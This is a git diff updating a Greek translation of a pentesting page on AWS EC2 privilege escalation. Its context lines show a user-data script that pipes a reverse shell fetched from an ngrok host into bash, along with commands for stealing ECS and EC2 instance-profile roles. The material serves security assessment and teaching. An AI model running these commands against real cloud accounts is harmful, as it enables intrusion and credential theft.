Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

This commit is contained in:
Translator
2025-02-06 02:14:37 +00:00
parent 8e183b201e
commit b735f8a77d

View File

@@ -30,7 +30,7 @@ echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=E<instance-profile-name> \
--iam-instance-profile Name=<instance-profile-name> \
--count 1 \
--user-data "file:///tmp/rev.sh"
```
@@ -40,11 +40,11 @@ aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
{{#endref}}
**Πιθανές Επιπτώσεις:** Άμεσο privesc σε οποιονδήποτε ρόλο EC2 συνδεδεμένο με υπάρχοντα προφίλ παρουσίας.
**Πιθανές Επιπτώσεις:** Άμεσο privesc σε οποιονδήποτε EC2 ρόλο συνδεδεμένο με υπάρχοντα προφίλ παρουσίας.
#### Privesc σε ECS
Με αυτό το σύνολο δικαιωμάτων θα μπορούσατε επίσης να **δημιουργήσετε μια παρουσία EC2 και να την καταχωρίσετε μέσα σε ένα ECS cluster**. Με αυτόν τον τρόπο, οι **υπηρεσίες** ECS θα **εκτελούνται** μέσα στην **παρουσία EC2** όπου έχετε πρόσβαση και στη συνέχεια μπορείτε να διεισδύσετε σε αυτές τις υπηρεσίες (δοχεία docker) και να **κλέψετε τους ρόλους ECS που είναι συνδεδεμένοι**.
Με αυτό το σύνολο δικαιωμάτων θα μπορούσατε επίσης να **δημιουργήσετε μια EC2 παρουσία και να την καταχωρίσετε μέσα σε ένα ECS cluster**. Με αυτόν τον τρόπο, οι **υπηρεσίες** του ECS θα **εκτελούνται** μέσα στην **EC2 παρουσία** όπου έχετε πρόσβαση και στη συνέχεια μπορείτε να διεισδύσετε σε αυτές τις υπηρεσίες (docker containers) και να **κλέψετε τους ECS ρόλους που είναι συνδεδεμένοι**.
```bash
aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
@@ -65,7 +65,7 @@ echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >>
aws-ecs-privesc.md
{{#endref}}
Εάν **δεν μπορείτε να δημιουργήσετε μια νέα instance** αλλά έχετε την άδεια `ecs:RegisterContainerInstance`, μπορεί να είστε σε θέση να καταχωρήσετε την instance μέσα στο cluster και να εκτελέσετε την σχολιασμένη επίθεση.
Εάν **δεν μπορείτε να δημιουργήσετε μια νέα instance** αλλά έχετε την άδεια `ecs:RegisterContainerInstance`, μπορεί να μπορείτε να καταχωρήσετε την instance μέσα στο cluster και να εκτελέσετε την σχολιασμένη επίθεση.
**Πιθανές Επιπτώσεις:** Άμεσο privesc σε ρόλους ECS που συνδέονται με εργασίες.
@@ -92,7 +92,7 @@ aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --ins
Με αυτές τις άδειες είναι δυνατόν να αλλάξετε το προφίλ instance που σχετίζεται με μια instance, οπότε αν η επίθεση είχε ήδη πρόσβαση σε μια instance, θα είναι σε θέση να κλέψει διαπιστευτήρια για περισσότερους ρόλους προφίλ instance αλλάζοντας αυτό που σχετίζεται με αυτήν.
- Αν **έχει ένα προφίλ instance**, μπορείτε να **αφαιρέσετε** το προφίλ instance (`ec2:DisassociateIamInstanceProfile`) και να **συσχετίσετε** το.
- Αν **έχει ένα προφίλ instance**, μπορείτε να **αφαιρέσετε** το προφίλ instance (`ec2:DisassociateIamInstanceProfile`) και να **συνδέσετε** το νέο.
```bash
aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
aws ec2 disassociate-iam-instance-profile --association-id <value>
@@ -231,7 +231,7 @@ ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-
```
Αυτή η μέθοδος δεν είναι τόσο χρήσιμη για privesc καθώς χρειάζεται να γνωρίζετε ένα όνομα χρήστη και έναν κωδικό πρόσβασης για να την εκμεταλλευτείτε.
**Πιθανές Επιπτώσεις:** (Πολύ μη αποδεδειγμένο) Άμεσο privesc στους ρόλους IAM EC2 που είναι συνδεδεμένοι σε εκτελούμενες παρουσίες.
**Πιθανές Επιπτώσεις:** (Πολύ δύσκολα αποδεικνύεται) Άμεσο privesc στους ρόλους IAM EC2 που είναι συνδεδεμένοι σε εκτελούμενες παρουσίες.
### `describe-launch-templates`,`describe-launch-template-versions`